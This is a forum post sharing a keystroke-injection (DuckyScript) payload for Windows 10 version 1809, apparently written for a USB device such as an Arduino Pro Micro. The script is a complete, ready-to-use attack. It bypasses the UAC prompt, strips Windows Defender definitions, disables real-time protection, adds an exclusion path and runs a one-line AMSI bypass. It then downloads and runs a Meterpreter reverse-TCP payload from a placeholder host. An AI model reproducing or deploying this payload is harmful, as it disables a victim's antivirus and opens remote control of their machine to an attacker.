Jump to content
mikeOxmaul

[PAYLOAD] Disable Windows Defender - Windows 10 (ver. 1809)

Recommended Posts

Disclaimer: Originally written in ducky script, then converted to Arduino for a school project.  Video linked uses Arduino Pro Micro.
 

 

POC: https://youtu.be/3hDdLbwFiM8
REM Title: msfQuack.txt
REM Author: mikeOxmaul (Props: Dan Tentler <Twitter @Viss> and Matt Graeber <Twitter @mattifestation>)
REM Date: 20020308
REM Target: Windows 10 (v. 1809)
REM Assumptions:
REM 1. Used against unlocked device w/admin lvl privileges
REM 2. Default 'prompt for consent' UAC policy in place for admin accts
REM Script will do the following:
REM 1. Remove Security Definitions for Windows Defender & Disable IOffice AV Protection
REM 2. Disable Real Time Monitoring Protection & Add Exclusion Path
REM 3. Download, Save and Run payload (windows/meterpreter/reverse_tcp)
REM Apologies in advance for the funky delays and not using 'GUI r'.  Tested on VirtualBox 6.1 on a macOS host.

REM Payload Start

DELAY 3000
REM 3 second delay for device to register
CTRL ESC
REM keyboard shortcut for search bar
DELAY 1700
STRING cmd
REM searching for cmd prompt
DELAY 750
CTRL SHIFT ENTER
REM 'run as admin' keyboard shortcut
DELAY 2500
ALT y
REM bypass UAC prompt
DELAY 1500
STRING cd %userprofile%
ENTER
DELAY 100
STRING "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
REM Removes all security definitions for windows defender and disables AV protection (credit to Dan Tentler)
ENTER
DELAY 100
STRING powershell
ENTER
DELAY 2500
STRING Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath "<define exclusion path here>"
REM Disables defender's 'real time monitoring' and sets exclusion path in event defender conducts a scan
ENTER
DELAY 100
STRING "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"
REM One line AMSI bypass (courtesy of Matt Graeber)
ENTER
DELAY 100
STRING iex (New-Object System.Net.WebClient).DownloadFile('http://<ipaddr>/<payload>','<path\to\payload>');Start-Process .\"<path\to\payload>"\
ENTER
DELAY 100
STRING exit
ENTER
REM Exiting Powershell
DELAY 1000
STRING exit
ENTER
REM End of Payload

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...